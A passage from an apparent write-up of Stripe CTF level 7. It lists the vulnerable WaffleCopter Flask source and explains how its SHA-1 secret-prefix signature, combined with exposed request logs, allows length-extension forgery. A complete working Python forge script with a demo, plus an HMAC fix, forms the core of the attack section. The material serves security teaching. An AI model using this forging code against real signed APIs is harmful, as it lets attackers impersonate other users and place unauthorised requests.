<a name="n128" href="https://stripe-ctf.com/levels/7#n128"></a>128
<a name="n129" href="https://stripe-ctf.com/levels/7#n129"></a>129
<strong><a name="n130" href="https://stripe-ctf.com/levels/7#n130"></a>130</strong>
<a name="n131" href="https://stripe-ctf.com/levels/7#n131"></a>131
<a name="n132" href="https://stripe-ctf.com/levels/7#n132"></a>132
<a name="n133" href="https://stripe-ctf.com/levels/7#n133"></a>133
<a name="n134" href="https://stripe-ctf.com/levels/7#n134"></a>134
<a name="n135" href="https://stripe-ctf.com/levels/7#n135"></a>135
<a name="n136" href="https://stripe-ctf.com/levels/7#n136"></a>136
<a name="n137" href="https://stripe-ctf.com/levels/7#n137"></a>137
<a name="n138" href="https://stripe-ctf.com/levels/7#n138"></a>138
<a name="n139" href="https://stripe-ctf.com/levels/7#n139"></a>139
<strong><a name="n140" href="https://stripe-ctf.com/levels/7#n140"></a>140</strong>
<a name="n141" href="https://stripe-ctf.com/levels/7#n141"></a>141
<a name="n142" href="https://stripe-ctf.com/levels/7#n142"></a>142
<a name="n143" href="https://stripe-ctf.com/levels/7#n143"></a>143
<a name="n144" href="https://stripe-ctf.com/levels/7#n144"></a>144
<a name="n145" href="https://stripe-ctf.com/levels/7#n145"></a>145
<a name="n146" href="https://stripe-ctf.com/levels/7#n146"></a>146
<a name="n147" href="https://stripe-ctf.com/levels/7#n147"></a>147
<a name="n148" href="https://stripe-ctf.com/levels/7#n148"></a>148
<a name="n149" href="https://stripe-ctf.com/levels/7#n149"></a>149
<strong><a name="n150" href="https://stripe-ctf.com/levels/7#n150"></a>150</strong>
<a name="n151" href="https://stripe-ctf.com/levels/7#n151"></a>151
<a name="n152" href="https://stripe-ctf.com/levels/7#n152"></a>152
<a name="n153" href="https://stripe-ctf.com/levels/7#n153"></a>153
<a name="n154" href="https://stripe-ctf.com/levels/7#n154"></a>154
<a name="n155" href="https://stripe-ctf.com/levels/7#n155"></a>155
<a name="n156" href="https://stripe-ctf.com/levels/7#n156"></a>156
<a name="n157" href="https://stripe-ctf.com/levels/7#n157"></a>157
<a name="n158" href="https://stripe-ctf.com/levels/7#n158"></a>158
<a name="n159" href="https://stripe-ctf.com/levels/7#n159"></a>159
<strong><a name="n160" href="https://stripe-ctf.com/levels/7#n160"></a>160</strong>
<a name="n161" href="https://stripe-ctf.com/levels/7#n161"></a>161
<a name="n162" href="https://stripe-ctf.com/levels/7#n162"></a>162
<a name="n163" href="https://stripe-ctf.com/levels/7#n163"></a>163
<a name="n164" href="https://stripe-ctf.com/levels/7#n164"></a>164
<a name="n165" href="https://stripe-ctf.com/levels/7#n165"></a>165
<a name="n166" href="https://stripe-ctf.com/levels/7#n166"></a>166
<a name="n167" href="https://stripe-ctf.com/levels/7#n167"></a>167
<a name="n168" href="https://stripe-ctf.com/levels/7#n168"></a>168
<a name="n169" href="https://stripe-ctf.com/levels/7#n169"></a>169
<strong><a name="n170" href="https://stripe-ctf.com/levels/7#n170"></a>170</strong>
<a name="n171" href="https://stripe-ctf.com/levels/7#n171"></a>171
<a name="n172" href="https://stripe-ctf.com/levels/7#n172"></a>172
<a name="n173" href="https://stripe-ctf.com/levels/7#n173"></a>173
<a name="n174" href="https://stripe-ctf.com/levels/7#n174"></a>174
<a name="n175" href="https://stripe-ctf.com/levels/7#n175"></a>175
<a name="n176" href="https://stripe-ctf.com/levels/7#n176"></a>176
<a name="n177" href="https://stripe-ctf.com/levels/7#n177"></a>177
<a name="n178" href="https://stripe-ctf.com/levels/7#n178"></a>178
<a name="n179" href="https://stripe-ctf.com/levels/7#n179"></a>179
<strong><a name="n180" href="https://stripe-ctf.com/levels/7#n180"></a>180</strong>
<a name="n181" href="https://stripe-ctf.com/levels/7#n181"></a>181
<a name="n182" href="https://stripe-ctf.com/levels/7#n182"></a>182
<a name="n183" href="https://stripe-ctf.com/levels/7#n183"></a>183
<a name="n184" href="https://stripe-ctf.com/levels/7#n184"></a>184
<a name="n185" href="https://stripe-ctf.com/levels/7#n185"></a>185
<a name="n186" href="https://stripe-ctf.com/levels/7#n186"></a>186
<a name="n187" href="https://stripe-ctf.com/levels/7#n187"></a>187
<a name="n188" href="https://stripe-ctf.com/levels/7#n188"></a>188
<a name="n189" href="https://stripe-ctf.com/levels/7#n189"></a>189
<strong><a name="n190" href="https://stripe-ctf.com/levels/7#n190"></a>190</strong>
<a name="n191" href="https://stripe-ctf.com/levels/7#n191"></a>191
<a name="n192" href="https://stripe-ctf.com/levels/7#n192"></a>192
<a name="n193" href="https://stripe-ctf.com/levels/7#n193"></a>193
<a name="n194" href="https://stripe-ctf.com/levels/7#n194"></a>194
<a name="n195" href="https://stripe-ctf.com/levels/7#n195"></a>195
<a name="n196" href="https://stripe-ctf.com/levels/7#n196"></a>196
<a name="n197" href="https://stripe-ctf.com/levels/7#n197"></a>197
<a name="n198" href="https://stripe-ctf.com/levels/7#n198"></a>198
<a name="n199" href="https://stripe-ctf.com/levels/7#n199"></a>199
<strong><a name="n200" href="https://stripe-ctf.com/levels/7#n200"></a>200</strong>
<a name="n201" href="https://stripe-ctf.com/levels/7#n201"></a>201
<a name="n202" href="https://stripe-ctf.com/levels/7#n202"></a>202
<a name="n203" href="https://stripe-ctf.com/levels/7#n203"></a>203
<a name="n204" href="https://stripe-ctf.com/levels/7#n204"></a>204
<a name="n205" href="https://stripe-ctf.com/levels/7#n205"></a>205
<a name="n206" href="https://stripe-ctf.com/levels/7#n206"></a>206
<a name="n207" href="https://stripe-ctf.com/levels/7#n207"></a>207
<a name="n208" href="https://stripe-ctf.com/levels/7#n208"></a>208
<a name="n209" href="https://stripe-ctf.com/levels/7#n209"></a>209
<strong><a name="n210" href="https://stripe-ctf.com/levels/7#n210"></a>210</strong>
<a name="n211" href="https://stripe-ctf.com/levels/7#n211"></a>211
<a name="n212" href="https://stripe-ctf.com/levels/7#n212"></a>212
<a name="n213" href="https://stripe-ctf.com/levels/7#n213"></a>213
<a name="n214" href="https://stripe-ctf.com/levels/7#n214"></a>214
<a name="n215" href="https://stripe-ctf.com/levels/7#n215"></a>215
<a name="n216" href="https://stripe-ctf.com/levels/7#n216"></a>216
<a name="n217" href="https://stripe-ctf.com/levels/7#n217"></a>217
<a name="n218" href="https://stripe-ctf.com/levels/7#n218"></a>218
<a name="n219" href="https://stripe-ctf.com/levels/7#n219"></a>219
<strong><a name="n220" href="https://stripe-ctf.com/levels/7#n220"></a>220</strong>
<a name="n221" href="https://stripe-ctf.com/levels/7#n221"></a>221
<a name="n222" href="https://stripe-ctf.com/levels/7#n222"></a>222
<a name="n223" href="https://stripe-ctf.com/levels/7#n223"></a>223
<a name="n224" href="https://stripe-ctf.com/levels/7#n224"></a>224
<a name="n225" href="https://stripe-ctf.com/levels/7#n225"></a>225
<a name="n226" href="https://stripe-ctf.com/levels/7#n226"></a>226
<a name="n227" href="https://stripe-ctf.com/levels/7#n227"></a>227
<a name="n228" href="https://stripe-ctf.com/levels/7#n228"></a>228
<a name="n229" href="https://stripe-ctf.com/levels/7#n229"></a>229
<strong><a name="n230" href="https://stripe-ctf.com/levels/7#n230"></a>230</strong>
<a name="n231" href="https://stripe-ctf.com/levels/7#n231"></a>231
<a name="n232" href="https://stripe-ctf.com/levels/7#n232"></a>232
<a name="n233" href="https://stripe-ctf.com/levels/7#n233"></a>233
<a name="n234" href="https://stripe-ctf.com/levels/7#n234"></a>234
<a name="n235" href="https://stripe-ctf.com/levels/7#n235"></a>235
<a name="n236" href="https://stripe-ctf.com/levels/7#n236"></a>236
<a name="n237" href="https://stripe-ctf.com/levels/7#n237"></a>237</pre>
</td>
<td>
<pre>#!/usr/bin/env python
import hashlib
import json
import logging
import os
import sys
import urllib
from functools import wraps

import bcrypt
import sqlite3
from flask import Flask, session, request, redirect, render_template, g, abort
from flask import make_response

import db
import settings

app = Flask(__name__)
app.config.from_object(settings)
app.logger.addHandler(logging.StreamHandler(sys.stderr))

if not os.path.exists(settings.entropy_file):
    print 'Entropy file not found. Have you run initialize_db.py?'

# use persistent entropy file for secret_key
app.secret_key = open(settings.entropy_file, 'r').read()

class BadSignature(Exception):
    pass
class BadRequest(Exception):
    pass

def valid_user(user, passwd):
    try:
        row = g.db.select_one('users', {'name': user})
    except db.NotFound:
        print 'Invalid user', repr(user)
        return False
    if bcrypt.hashpw(passwd, row['password']) == row['password']:
        print 'Valid user:', repr(user)
        return row
    else:
        print 'Invalid password for', repr(user)
        return False

def log_in(user, row):
    session['user'] = row
    session['username'] = user

def absolute_url(path):
    return settings.url_root + path

def require_authentication(func):
    @wraps(func)
    def newfunc(*args, **kwargs):
        if 'user' not in session:
            return redirect(absolute_url('/login'))
        return func(*args, **kwargs)
    return newfunc

def json_response(obj, status_code=200):
    text = json.dumps(obj) + '\n'
    resp = make_response(text, status_code)
    resp.headers['content-type'] = 'application/json'
    return resp

def json_error(message, status_code):
    return json_response({'error': message}, status_code)

def log_api_request(user_id, path, body):
    if isinstance(body, str):
        # body is a string byte stream, but sqlite will think it's utf-8
        # convert each character to unicode so it's unambiguous
        body = ''.join(unichr(ord(c)) for c in body)
    g.db.insert('logs', {'user_id': user_id, 'path': path, 'body': body})

def get_logs(user_id):
    return g.db.select('logs', {'user_id': user_id})

def get_waffles():
    return g.db.select('waffles')

@app.before_request
def before_request():
    g.db = db.DB(settings.database)
    g.cursor = g.db.cursor

@app.teardown_request
def teardown_request(exception):
    if hasattr(g, 'db'):
        g.db.commit()
        g.db.close()

@app.route('/')
@require_authentication
def index():
    user = session['user']
    waffles = get_waffles()
    return render_template('index.html', user=user, waffles=waffles,
                           endpoint=request.url_root)

@app.route('/login', methods=['GET', 'POST'])
def login():
    error = None
    if request.method == 'POST':
        user = request.form['username']
        password = request.form['password']
        row = valid_user(user, password)
        if row:
            log_in(user, row)
            return redirect(absolute_url('/'))
        else:
            error = 'Invalid username or password'

    return render_template('login.html', error=error)

@app.route('/logs/&lt;int:id&gt;')
@require_authentication
def logs(id):
    rows = get_logs(id)
    return render_template('logs.html', logs=rows)

def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

    h = hashlib.sha1()
    h.update(secret + raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True

def parse_params(raw_params):
    pairs = raw_params.split('&amp;')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        params[key] = val
    return params

def parse_post_body(body):
    try:
        raw_params, sig = body.strip('\n').rsplit('|sig:', 1)
    except ValueError:
        raise BadRequest('Request must be of form params|sig:da39a3ee5e6b...')

    return raw_params, sig

def process_order(params):
    user = g.db.select_one('users', {'id': params['user_id']})

    # collect query parameters
    try:
        waffle_name = params['waffle']
    except KeyError:
        return json_error('must specify waffle', 400)
    try:
        count = int(params['count'])
    except (KeyError, ValueError):
        return json_error('must specify count', 400)
    try:
        lat, long = float(params['lat']), float(params['long'])
    except (KeyError, ValueError):
        return json_error('where would you like your waffle today?', 400)

    if count &lt; 1:
        return json_error('count must be &gt;= 1', 400)

    # get waffle info
    try:
        waffle = g.db.select_one('waffles', {'name': waffle_name})
    except db.NotFound:
        return json_error('no such waffle: %s' % waffle_name, 404)

    # check premium status
    if waffle['premium'] and not user['premium']:
        return json_error('that waffle requires a premium subscription', 402)

    # return results
    plural = 's' if count &gt; 1 else ''
    msg = 'Great news: %d %s waffle%s will soon be flying your way!' \
        % (count, waffle_name, plural)
    return json_response({'success': True, 'message': msg,
                          'confirm_code': waffle['confirm']})

@app.route('/orders', methods=['POST'])
def order():
    # We need the original POST body in order to check the hash, so we use
    # request.input_stream rather than request.form.
    request.shallow = True
    body = request.input_stream.read(
        request.headers.get('content-length', type=int) or 0)

    # parse POST body
    try:
        raw_params, sig = parse_post_body(body)
    except BadRequest, e:
        print 'failed to parse', repr(body)
        return json_error(e.message, 400)

    print 'raw_params:', repr(raw_params)

    try:
        params = parse_params(raw_params)
    except ValueError:
        raise BadRequest('Could not parse params')

    print 'sig:', repr(sig)

    # look for user_id and signature
    try:
        user_id = params['user_id']
    except KeyError:
        print 'user_id not provided'
        return json_error('must provide user_id', 401)

    # check that signature matches
    try:
        verify_signature(user_id, sig, raw_params)
    except BadSignature, e:
        return json_error('signature check failed: ' + e.message, 401)

    # all OK -- process the order
    log_api_request(params['user_id'], '/orders', body)
    return process_order(params)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=9233)</pre>
</td>
</tr>
</tbody>
</table>
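Added example, not code from the level or from this post (and Python 3, where the level is Python 2): <code>verify_signature()</code> accepts <code>sig</code> whenever it equals SHA-1 of the user's secret concatenated with the raw body, and <code>parse_params()</code> lets a repeated key overwrite the earlier one. Together they mean that anyone holding one valid signed body (and <code>/logs/&lt;int:id&gt;</code> only requires a session, not that <code>id</code> belong to the logged-in user) can append <code>&amp;waffle=liege</code> and compute a valid signature by SHA-1 length extension, knowing only that secrets are 14 characters long (<code>rand_alnum(14)</code> in <code>initialize_db.py</code>). The secret, the body and the appended suffix below are constructed for the example, and the body format is assumed since <code>client.py</code> is not shown; <code>hmac_verify()</code> shows the replacement check (HMAC plus constant-time comparison).

```python
# Added example (not part of the level's source): SHA-1 length extension
# against sig = SHA1(secret + raw_params), the scheme verify_signature() checks.
import hashlib
import hmac
import struct
import urllib.parse

SECRET_LEN = 14  # initialize_db.py creates API secrets with rand_alnum(14)
_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def _sha1_compress(state, block):
    """SHA-1 compression function over one 64-byte block."""
    w = list(struct.unpack('>16I', block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        t = (_rotl(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF
        a, b, c, d, e = t, a, _rotl(b, 30), c, d
    return tuple((s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e)))

def sha1_padding(msg_len):
    """Bytes SHA-1 appends to a msg_len-byte message: 0x80, zeros, 64-bit bit length."""
    return b'\x80' + b'\x00' * ((55 - msg_len) % 64) + struct.pack('>Q', msg_len * 8)

def _hex(state):
    return ''.join('%08x' % s for s in state)

def sha1_hex(msg):
    """Plain SHA-1, so the compressor above can be checked against hashlib."""
    state, data = _IV, msg + sha1_padding(len(msg))
    for i in range(0, len(data), 64):
        state = _sha1_compress(state, data[i:i + 64])
    return _hex(state)

def sha1_matches_hashlib(msg):
    return sha1_hex(msg) == hashlib.sha1(msg).hexdigest()

def forge(raw_params, sig, suffix, secret_len=SECRET_LEN):
    """From one valid (raw_params, sig) pair build (raw_params', sig') that the
    level's check also accepts, knowing only the secret's length, not its value."""
    glue = sha1_padding(secret_len + len(raw_params))
    # `sig` is SHA-1's internal state after the server hashed secret+raw_params+glue,
    # so resume from that state and feed it only the suffix plus fresh padding.
    state = struct.unpack('>5I', bytes.fromhex(sig))
    resumed_len = secret_len + len(raw_params) + len(glue)
    data = suffix + sha1_padding(resumed_len + len(suffix))
    for i in range(0, len(data), 64):
        state = _sha1_compress(state, data[i:i + 64])
    return raw_params + glue + suffix, _hex(state)

def naive_verify(secret, raw_params, sig):
    """The level's check, as verify_signature() does it."""
    return hashlib.sha1(secret + raw_params).hexdigest() == sig

def parse_params(raw_params):
    """Mirror of the level's parse_params(): a repeated key keeps its last value."""
    params = {}
    for pair in raw_params.split(b'&'):
        key, val = pair.split(b'=')
        params[urllib.parse.unquote_plus(key.decode('latin-1'))] = \
            urllib.parse.unquote_plus(val.decode('latin-1'))
    return params

def hmac_verify(secret, raw_params, sig):
    """Hardened check: HMAC is not extendable, compare_digest is constant-time."""
    expected = hmac.new(secret, raw_params, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)

def demo():
    # Constructed sample: a 14-char secret the attacker never sees, and one body
    # signed with it, of the kind the logs page shows for another user (assumed format).
    secret = b'Xq7zL2pA9mK4wR'
    body = b'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo'
    sig = hashlib.sha1(secret + body).hexdigest()
    forged, forged_sig = forge(body, sig, b'&waffle=liege')
    params = parse_params(forged)
    return {
        'naive_accepts_forgery': naive_verify(secret, forged, forged_sig),
        'waffle_seen_by_server': params['waffle'],
        'user_id_seen_by_server': params['user_id'],
        'hmac_accepts_forgery': hmac_verify(secret, forged, forged_sig),
    }

if __name__ == '__main__':
    print(demo())
```

<code>demo()</code> returns a dict showing that the level's check accepts the extended body, that the server then sees <code>waffle=liege</code> for <code>user_id=1</code> (larry, a premium user in <code>initialize_db.py</code>), and that the HMAC check rejects it. The glue bytes sit inside the value of the last original key, so nothing else in the parsed body changes. When the secret length is not known from the source, the same <code>forge()</code> is repeated over candidate lengths until the server stops answering with a signature error.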
The contents of <code>db.py</code>:
<table>
<tbody>
<tr>
<td>
<pre>import os
import sqlite3
import sys

class NotFound(Exception):
    pass
class ManyFound(Exception):
    pass

# for app.secret_key
def rewrite_entropy_file(path):
    f = open(path, 'w')
    f.write(os.urandom(24))
    f.close()

class DB(object):
    def __init__(self, database):
        self.conn = sqlite3.connect(database,
                                    detect_types=sqlite3.PARSE_DECLTYPES)
        self.conn.row_factory = sqlite3.Row
        self.cursor = self.conn.cursor()
        self.debug = False

    def log(self, *args):
        if self.debug:
            for i in args:
                sys.stderr.write(str(i))
            sys.stderr.write('\n')

    def commit(self):
        self.conn.commit()

    def close(self):
        self.cursor.close()
        self.conn.close()

    def select(self, table, where=None):
        if where is None:
            where = {}
        self.do_select(table, where)
        return map(dict, self.cursor.fetchall())

    def select_one(self, table, where=None):
        where = where or {}
        self.do_select(table, where)

        row = self.cursor.fetchone()
        if row is None:
            raise NotFound

        if self.cursor.fetchone() is not None:
            raise ManyFound

        return dict(row)

    def do_select(self, table, where=None):
        where = where or {}
        where_clause = ' AND '.join('%s=?' % key for key in where.iterkeys())
        values = where.values()
        q = 'select * from ' + str(table)
        if where_clause:
            q += ' where ' + where_clause
        self.log(q, '&lt;==', values)
        self.cursor.execute(q, values)

    def insert(self, table, data):
        cols = ', '.join(data.keys())
        vals = data.values()
        placeholders = ', '.join('?' for i in data)
        q = 'insert into %s (%s) values (%s)' % (table, cols, placeholders)
        self.log(q, '&lt;==', vals)
        self.cursor.execute(q, vals)
        self.commit()
        return self.cursor.rowcount</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>settings.py</code>:
<table>
<tbody>
<tr>
<td>
<pre>import os

DEBUG = False
database = os.path.join(os.path.dirname(__file__), 'wafflecopter.db')
entropy_file = os.path.join(os.path.dirname(__file__), 'entropy.dat')

url_root = ''

try:
    from local_settings import *
except ImportError:
    pass</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>initialize_db.py</code>:
<table>
<tbody>
<tr>
<td>
<pre>#!/usr/bin/env python
import sys
from datetime import datetime
from random import SystemRandom

import bcrypt
import sqlite3

import client
import db
import settings

conn = db.DB(settings.database)
conn.debug = True
c = conn.cursor

db.rewrite_entropy_file(settings.entropy_file)

rand = SystemRandom()

def rand_choice(alphabet, length):
    return ''.join(rand.choice(alphabet) for i in range(length))

alphanum = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
def rand_alnum(length):
    return rand_choice(alphanum, length)

def main(level_password):
    create_tables()
    add_users()
    add_waffles(level_password)
    add_logs()

def add_users():
    add_user(1, 'larry', rand_alnum(16), 1)
    add_user(2, 'randall', rand_alnum(16), 1)
    add_user(3, 'alice', rand_alnum(16), 0)
    add_user(4, 'bob', rand_alnum(16), 0)
    add_user(5, 'ctf', 'password', 0)

def add_waffles(level_password):
    add_waffle('liege', 1, level_password)
    add_waffle('dream', 1, rand_alnum(14))
    add_waffle('veritaffle', 0, rand_alnum(14))
    add_waffle('chicken', 1, rand_alnum(14))
    add_waffle('belgian', 0, rand_alnum(14))
    add_waffle('brussels', 0, rand_alnum(14))
    add_waffle('eggo', 0, rand_alnum(14))

def add_logs():
    gen_log(1, '/orders', {'waffle': 'eggo', 'count': 10,
                           'lat': 37.351, 'long': -119.827})
    gen_log(1, '/orders', {'waffle': 'chicken', 'count': 2,
                           'lat': 37.351, 'long': -119.827})
    gen_log(2, '/orders', {'waffle': 'dream', 'count': 2,
                           'lat': 42.39561, 'long': -71.13051},
            date=datetime(2007, 9, 23, 14, 38, 00))
    gen_log(3, '/orders', {'waffle': 'veritaffle', 'count': 1,
                           'lat': 42.376, 'long': -71.116})

def create_tables():
    c.execute('drop table if exists users')
    c.execute('''
    CREATE TABLE users(
    id int not null primary key,
    name varchar(255) not null,
    password varchar(255) not null,
    premium int not null,
    secret varchar(255) not null,
    unique (name)
    )
    ''')

    c.execute('drop table if exists waffles')
    c.execute('''
    CREATE TABLE waffles(
    name varchar(255) not null primary key,
    premium int not null,
    confirm varchar(255) not null
    )
    ''')

    c.execute('drop table if exists logs')
    c.execute('''
    CREATE TABLE logs(
    user_id int not null,
    path varchar(255) not null,
    body text not null,
    date timestamp not null default current_timestamp
    )
    ''')
    c.execute('create index user_id on logs (user_id)')
    c.execute('create index date on logs (date)')

def add_user(uid, username, password, premium):
    hashed = bcrypt.hashpw(password, bcrypt.gensalt(10))
    secret = rand_alnum(14)
    data = {'id': uid, 'name': username, 'password': hashed,
            'premium': premium, 'secret': secret}
    conn.insert('users', data)

def get_user(uid):
    return conn.select_one('users', {'id': uid})

def add_waffle(name, premium, confirm):
    data = {'name': name, 'premium': premium, 'confirm': confirm}
    conn.insert('waffles', data)

def gen_log(user_id, path, params, date=None):
    user = get_user(user_id)

    # generate signature using client library
    cl = client.Client(None, user_id, user['secret'])
    body = cl._make_post(params)

    # prepare data for insert
    data = {'user_id': user_id, 'path': path, 'body': body}

    if date:
        data['date'] = date

    conn.insert('logs', data)

if __name__ == '__main__':
    if len(sys.argv) &lt; 2:
        print 'usage: initialize_db.py LEVEL_PASSWORD'
        sys.exit(1)

    main(sys.argv[1])</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>templates/index.html</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;!doctype html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;WaffleCopter&lt;/title&gt;
    &lt;style&gt;
      a {
        color: black;
      }
      a:hover {
        color: blue;
      }
    &lt;/style&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;h1&gt;WaffleCopter [beta]&lt;/h1&gt;
    &lt;p&gt;Welcome, {{user['name']}}!&lt;/p&gt;
    &lt;h3&gt;Your API credentials&lt;/h3&gt;
    &lt;ul&gt;
      &lt;li&gt;&lt;strong&gt;endpoint:&lt;/strong&gt; &lt;code&gt;{{ endpoint }}&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;strong&gt;user_id:&lt;/strong&gt; &lt;code&gt;{{ user['id'] }}&lt;/code&gt;&lt;/li&gt;
      &lt;li&gt;&lt;strong&gt;secret:&lt;/strong&gt; &lt;code&gt;{{ user['secret'] }}&lt;/code&gt;&lt;/li&gt;
    &lt;/ul&gt;
    &lt;h3&gt;Available waffles&lt;/h3&gt;
    &lt;ul&gt;
      {% for waffle in waffles %}
      &lt;li&gt;
        {{ waffle['name'] }}{% if waffle['premium'] %} (premium){% endif %}
      &lt;/li&gt;
      {% endfor %}
    &lt;/ul&gt;
    &lt;h3&gt;&lt;a href="./logs/{{ user['id'] }}"&gt;API Request logs&lt;/a&gt;&lt;/h3&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>templates/login.html</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;!doctype html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;WaffleCopter - Login&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;h1&gt;WaffleCopter [beta]&lt;/h1&gt;
    {% if error %}
    &lt;p style="color: red"&gt;{{ error }}&lt;/p&gt;
    {% endif %}
    &lt;form action="./login" method="post"&gt;
      &lt;table&gt;
        &lt;tr&gt;
          &lt;td&gt;username:&lt;/td&gt;&lt;td&gt;&lt;input type="text" name="username" /&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
          &lt;td&gt;password:&lt;/td&gt;&lt;td&gt;&lt;input type="password" name="password" /&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
          &lt;td colspan=2&gt;&lt;input type="submit" value="log in" /&gt;&lt;/td&gt;
        &lt;/tr&gt;
      &lt;/table&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>templates/logs.html</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;!doctype html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;WaffleCopter - Logs&lt;/title&gt;
    &lt;style type="text/css"&gt;
      table#logs {
        border-collapse: collapse;
      }
      #logs td,th {
        border: 1px solid #CCC;
        padding: 5px;
      }
      #home {
        text-decoration: none;
        color: #000;
      }
      #home:hover {
        color: blue;
      }
    &lt;/style&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;h1&gt;&lt;a id=home href="../"&gt;WaffleCopter [beta]&lt;/a&gt;&lt;/h1&gt;
    &lt;h3&gt;API Request Logs&lt;/h3&gt;
    &lt;table id=logs&gt;
      &lt;tr&gt;&lt;th&gt;date&lt;/th&gt;&lt;th&gt;path&lt;/th&gt;&lt;th&gt;body&lt;/th&gt;&lt;/tr&gt;
      {% for log in logs %}
      &lt;tr&gt;
        &lt;td&gt;{{ log['date'].strftime('%F %R:%S') }}&lt;/td&gt;
        &lt;td&gt;{{ log['path'] }}&lt;/td&gt;
        &lt;td&gt;&lt;code&gt;{{ log['body'].encode('unicode-escape') }}&lt;/code&gt;&lt;/td&gt;
      &lt;/tr&gt;
      {% endfor %}
    &lt;/table&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</tbody>
</table>

<strong>Solution</strong>

This one was my favorite, since 90% of its progress was cryptographic. It is a service that accepts requests of the following form:
<blockquote>count=1&amp;lat=100&amp;user_id=5&amp;long=100&amp;waffle=eggo|sig:36c698a40093329045ca293d6e0c985411d366d1</blockquote>
On a certain endpoint (URL) and sends you a waffle! The request describes the number of waffles, the latitude and longitude of the target, the user_id placing the order and the type of waffle. Three waffle types are served only to premium users; one of them is named <strong>liege</strong>. We are not a premium user, but we have to place a valid order for liege to get our flag.

If you simply order a liege on your user_id, you would get
<blockquote>
<pre>that waffle requires a premium subscription</pre>
</blockquote>
And if you provide user_id as 1 (a premium user), you would get:
<blockquote>
<pre>signature check failed</pre>
</blockquote>
This means that the system uses some sort of Message Authentication Code (MAC, called a signature here) to validate the request's source. Every user has a secret key used to sign their requests, and the server verifies the signature with the following code:
<pre>def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

    h = hashlib.sha1()
    h.update(secret + raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True</pre>
It retrieves the user's secret from the database, computes sha1(secret + raw_params) and compares the hex digest against the signature that was sent. raw_params is the part of the request before the | sign (the whole request without the signature). Note also that the comparison is a plain <code>!=</code>, which returns as soon as the first differing byte is found; a constant-time comparison such as <code>hmac.compare_digest</code> is the usual practice, although that is not the weakness exploited here.

If the two digests match, the request is authentic; otherwise an error is returned. This construction, H(secret || message), is a secret-prefix MAC, not <a title="Hash-based message authentication code" href="https://en.wikipedia.org/wiki/HMAC" target="_blank">HMAC</a>. Real HMAC computes H((K ⊕ opad) || H((K ⊕ ipad) || message)): the inner hash is keyed, and its output is hashed again under a second derived key, so an attacker never sees a raw hash state that can be continued. Read <a href="https://en.wikipedia.org/wiki/HMAC#Design_principles" target="_blank">this section</a> of Wikipedia for why the prefix construction is broken and the nested one is not.

I'm going to describe it here as well, since this is the key to the challenge. A cryptographic hash function is a state machine: it starts from fixed initial values (defined in the description of the algorithm), the input is cut into fixed-size blocks, and each block is fed through the compression function to update the state. SHA-1 works on 512-bit (64-byte) blocks and keeps a 160-bit (20-byte) state, which is also its output. If the input is not a multiple of 64 bytes it is padded, and the padding is not plain zeroes: a single 0x80 byte, then zero bytes up to 8 bytes short of a block boundary, then the length of the original message in bits as a 64-bit big-endian integer. The SHA1 machine is depicted below:

<a href="https://en.wikipedia.org/wiki/Sha1"><img class="aligncenter" title="SHA1 Diagram" src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e2/SHA-1.svg/300px-SHA-1.svg.png" alt="SHA1 Diagram" width="300" height="312" /></a>


Now suppose we know C = SHA1(A) and the length of A, but not A itself, and what we want is SHA1(A + B) (plus means concatenation here). We don't have A, so we can't compute A + B and hash it, but couldn't we get the final result some other way?

We definitely could. When SHA1(A + B) is computed, the algorithm first consumes the blocks holding A and only then continues with B. C is exactly the state of the machine after A (plus its padding) has been processed, so we load that state instead of the initial values, feed B through the same machine and finish normally: we obtain SHA1(A + pad(A) + B) without ever knowing A.

